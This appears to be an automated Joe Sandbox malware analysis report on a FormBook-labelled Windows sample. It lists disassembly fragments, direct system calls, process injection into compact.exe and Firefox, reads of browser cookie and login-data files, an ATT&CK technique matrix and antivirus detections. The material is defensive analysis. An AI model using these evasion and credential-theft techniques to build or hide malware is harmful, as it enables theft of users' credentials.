          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102A2C3 mov eax, dword ptr fs:[00000030h]0_2_0102A2C3
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0102A2C3 mov eax, dword ptr fs:[00000030h]0_2_0102A2C3
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010302E1 mov eax, dword ptr fs:[00000030h]0_2_010302E1
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010302E1 mov eax, dword ptr fs:[00000030h]0_2_010302E1
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010302E1 mov eax, dword ptr fs:[00000030h]0_2_010302E1
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010B6500 mov eax, dword ptr fs:[00000030h]0_2_010B6500
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010F4500 mov eax, dword ptr fs:[00000030h]0_2_010F4500
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010F4500 mov eax, dword ptr fs:[00000030h]0_2_010F4500
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010F4500 mov eax, dword ptr fs:[00000030h]0_2_010F4500
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010F4500 mov eax, dword ptr fs:[00000030h]0_2_010F4500
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010F4500 mov eax, dword ptr fs:[00000030h]0_2_010F4500
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010F4500 mov eax, dword ptr fs:[00000030h]0_2_010F4500
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010F4500 mov eax, dword ptr fs:[00000030h]0_2_010F4500
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01030535 mov eax, dword ptr fs:[00000030h]0_2_01030535
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01030535 mov eax, dword ptr fs:[00000030h]0_2_01030535
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01030535 mov eax, dword ptr fs:[00000030h]0_2_01030535
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01030535 mov eax, dword ptr fs:[00000030h]0_2_01030535
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01030535 mov eax, dword ptr fs:[00000030h]0_2_01030535
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01030535 mov eax, dword ptr fs:[00000030h]0_2_01030535
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104E53E mov eax, dword ptr fs:[00000030h]0_2_0104E53E
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104E53E mov eax, dword ptr fs:[00000030h]0_2_0104E53E
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104E53E mov eax, dword ptr fs:[00000030h]0_2_0104E53E
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104E53E mov eax, dword ptr fs:[00000030h]0_2_0104E53E
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104E53E mov eax, dword ptr fs:[00000030h]0_2_0104E53E
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01028550 mov eax, dword ptr fs:[00000030h]0_2_01028550
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01028550 mov eax, dword ptr fs:[00000030h]0_2_01028550
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105656A mov eax, dword ptr fs:[00000030h]0_2_0105656A
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105656A mov eax, dword ptr fs:[00000030h]0_2_0105656A
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105656A mov eax, dword ptr fs:[00000030h]0_2_0105656A
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01022582 mov eax, dword ptr fs:[00000030h]0_2_01022582
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01022582 mov ecx, dword ptr fs:[00000030h]0_2_01022582
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01054588 mov eax, dword ptr fs:[00000030h]0_2_01054588
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105E59C mov eax, dword ptr fs:[00000030h]0_2_0105E59C
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A05A7 mov eax, dword ptr fs:[00000030h]0_2_010A05A7
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A05A7 mov eax, dword ptr fs:[00000030h]0_2_010A05A7
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A05A7 mov eax, dword ptr fs:[00000030h]0_2_010A05A7
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010445B1 mov eax, dword ptr fs:[00000030h]0_2_010445B1
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010445B1 mov eax, dword ptr fs:[00000030h]0_2_010445B1
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105E5CF mov eax, dword ptr fs:[00000030h]0_2_0105E5CF
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105E5CF mov eax, dword ptr fs:[00000030h]0_2_0105E5CF
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010265D0 mov eax, dword ptr fs:[00000030h]0_2_010265D0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105A5D0 mov eax, dword ptr fs:[00000030h]0_2_0105A5D0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105A5D0 mov eax, dword ptr fs:[00000030h]0_2_0105A5D0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010225E0 mov eax, dword ptr fs:[00000030h]0_2_010225E0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104E5E7 mov eax, dword ptr fs:[00000030h]0_2_0104E5E7
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104E5E7 mov eax, dword ptr fs:[00000030h]0_2_0104E5E7
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104E5E7 mov eax, dword ptr fs:[00000030h]0_2_0104E5E7
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104E5E7 mov eax, dword ptr fs:[00000030h]0_2_0104E5E7
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104E5E7 mov eax, dword ptr fs:[00000030h]0_2_0104E5E7
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104E5E7 mov eax, dword ptr fs:[00000030h]0_2_0104E5E7
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104E5E7 mov eax, dword ptr fs:[00000030h]0_2_0104E5E7
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0104E5E7 mov eax, dword ptr fs:[00000030h]0_2_0104E5E7
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105C5ED mov eax, dword ptr fs:[00000030h]0_2_0105C5ED
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105C5ED mov eax, dword ptr fs:[00000030h]0_2_0105C5ED
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01058402 mov eax, dword ptr fs:[00000030h]0_2_01058402
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01058402 mov eax, dword ptr fs:[00000030h]0_2_01058402
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_01058402 mov eax, dword ptr fs:[00000030h]0_2_01058402
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0101E420 mov eax, dword ptr fs:[00000030h]0_2_0101E420
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0101E420 mov eax, dword ptr fs:[00000030h]0_2_0101E420
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0101E420 mov eax, dword ptr fs:[00000030h]0_2_0101E420
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0101C427 mov eax, dword ptr fs:[00000030h]0_2_0101C427
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A6420 mov eax, dword ptr fs:[00000030h]0_2_010A6420
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A6420 mov eax, dword ptr fs:[00000030h]0_2_010A6420
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A6420 mov eax, dword ptr fs:[00000030h]0_2_010A6420
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A6420 mov eax, dword ptr fs:[00000030h]0_2_010A6420
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A6420 mov eax, dword ptr fs:[00000030h]0_2_010A6420
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A6420 mov eax, dword ptr fs:[00000030h]0_2_010A6420
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010A6420 mov eax, dword ptr fs:[00000030h]0_2_010A6420
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105E443 mov eax, dword ptr fs:[00000030h]0_2_0105E443
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105E443 mov eax, dword ptr fs:[00000030h]0_2_0105E443
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105E443 mov eax, dword ptr fs:[00000030h]0_2_0105E443
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105E443 mov eax, dword ptr fs:[00000030h]0_2_0105E443
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105E443 mov eax, dword ptr fs:[00000030h]0_2_0105E443
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105E443 mov eax, dword ptr fs:[00000030h]0_2_0105E443
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105E443 mov eax, dword ptr fs:[00000030h]0_2_0105E443
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_0105E443 mov eax, dword ptr fs:[00000030h]0_2_0105E443
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exeCode function: 0_2_010DA456 mov eax, dword ptr fs:[00000030h]0_2_010DA456

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe NtWriteVirtualMemory: Direct from: 0x76F0490C
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe NtAllocateVirtualMemory: Direct from: 0x76F03C9C
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe NtClose: Direct from: 0x76F02B6C
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe NtReadVirtualMemory: Direct from: 0x76F02E8C
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe NtCreateKey: Direct from: 0x76F02C6C
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe NtSetInformationThread: Direct from: 0x76F02B4C
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe NtQueryAttributesFile: Direct from: 0x76F02E6C
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe NtQuerySystemInformation: Direct from: 0x76F048CC
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe NtOpenSection: Direct from: 0x76F02E0C
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe NtSetInformationThread: Direct from: 0x76EF63F9
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe NtAllocateVirtualMemory: Direct from: 0x76F02BEC
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe NtCreateFile: Direct from: 0x76F02FEC
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe NtOpenFile: Direct from: 0x76F02DCC
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe NtQueryInformationToken: Direct from: 0x76F02CAC
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe NtTerminateThread: Direct from: 0x76F02FCC
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe NtProtectVirtualMemory: Direct from: 0x76EF7B2E
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe NtOpenKeyEx: Direct from: 0x76F02B9C
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe NtSetInformationProcess: Direct from: 0x76F02C5C
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe NtNotifyChangeKey: Direct from: 0x76F03C2C
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe NtCreateMutant: Direct from: 0x76F035CC
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe NtMapViewOfSection: Direct from: 0x76F02D1C
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe NtResumeThread: Direct from: 0x76F036AC
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe NtReadFile: Direct from: 0x76F02ADC
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe NtQuerySystemInformation: Direct from: 0x76F02DFC
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe; Section loaded: NULL target: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe; Section loaded: NULL target: C:\Windows\SysWOW64\compact.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\compact.exe; Section loaded: NULL target: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe protection: read write
          Source: C:\Windows\SysWOW64\compact.exe; Section loaded: NULL target: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\compact.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
          Source: C:\Windows\SysWOW64\compact.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\compact.exe; Thread register set: target process: 8012
          Source: C:\Windows\SysWOW64\compact.exe; Thread APC queued: target process: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe; Process created: C:\Windows\SysWOW64\compact.exe "C:\Windows\SysWOW64\compact.exe"
          Source: C:\Windows\SysWOW64\compact.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
          Source: XFLTednCZUTqje.exe, 00000002.00000002.3604301729.0000000001591000.00000002.00000001.00040000.00000000.sdmp, XFLTednCZUTqje.exe, 00000002.00000000.1895438945.0000000001591000.00000002.00000001.00040000.00000000.sdmp, XFLTednCZUTqje.exe, 00000006.00000000.2039209024.00000000016A0000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
          Source: XFLTednCZUTqje.exe, 00000002.00000002.3604301729.0000000001591000.00000002.00000001.00040000.00000000.sdmp, XFLTednCZUTqje.exe, 00000002.00000000.1895438945.0000000001591000.00000002.00000001.00040000.00000000.sdmp, XFLTednCZUTqje.exe, 00000006.00000000.2039209024.00000000016A0000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progman
          Source: XFLTednCZUTqje.exe, 00000002.00000002.3604301729.0000000001591000.00000002.00000001.00040000.00000000.sdmp, XFLTednCZUTqje.exe, 00000002.00000000.1895438945.0000000001591000.00000002.00000001.00040000.00000000.sdmp, XFLTednCZUTqje.exe, 00000006.00000000.2039209024.00000000016A0000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
          Source: XFLTednCZUTqje.exe, 00000002.00000002.3604301729.0000000001591000.00000002.00000001.00040000.00000000.sdmp, XFLTednCZUTqje.exe, 00000002.00000000.1895438945.0000000001591000.00000002.00000001.00040000.00000000.sdmp, XFLTednCZUTqje.exe, 00000006.00000000.2039209024.00000000016A0000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: }Program Manager

          Stealing of Sensitive Information

          Source: Yara match; File source: 0.2.NjjLYnPSZr.exe.df0000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 00000005.00000002.3604353824.00000000035A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000006.00000002.3606411027.0000000005500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000002.00000002.3604571155.0000000003490000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000002.3604458798.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000000.00000002.1971118603.0000000000D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000000.00000002.1971533263.0000000001E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000002.3603288385.00000000030E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\compact.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
          Source: C:\Windows\SysWOW64\compact.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
          Source: C:\Windows\SysWOW64\compact.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
          Source: C:\Windows\SysWOW64\compact.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\compact.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\compact.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
          Source: C:\Windows\SysWOW64\compact.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
          Source: C:\Windows\SysWOW64\compact.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Windows\SysWOW64\compact.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

          Remote Access Functionality

          Source: Yara match; File source: 0.2.NjjLYnPSZr.exe.df0000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 00000005.00000002.3604353824.00000000035A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000006.00000002.3606411027.0000000005500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000002.00000002.3604571155.0000000003490000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000002.3604458798.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000000.00000002.1971118603.0000000000D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000000.00000002.1971533263.0000000001E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000002.3603288385.00000000030E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
          Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 312 Process Injection | 2 Virtualization/Sandbox Evasion | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
          Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 312 Process Injection | LSASS Memory | 2 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
          Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
          Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Abuse Elevation Control Mechanism | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
          Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 4 Obfuscated Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
          Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Software Packing | Cached Domain Credentials | 12 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
          DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
          Source | Detection | Scanner | Label | Link
          NjjLYnPSZr.exe | 61% | ReversingLabs | Win32.Backdoor.FormBook
          NjjLYnPSZr.exe | 100% | Avira | TR/Crypt.ZPACK.Gen
          NjjLYnPSZr.exe | 100% | Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          Source | Detection | Scanner | Label | Link
          https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
          https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
          https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
          https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1530786
Start date and time: 2024-10-10 14:44:31 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 37s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: NjjLYnPSZr.exe (renamed because original name is a hash value)
Original Sample Name: 2fc1d7f69545d2931aa3f9ce5f9cb5e038027f20200e9b416befea7465413f32.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@5/1@13/9
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 14
• Number of non-executed functions: 329
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target XFLTednCZUTqje.exe, PID 6040 because it is empty
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
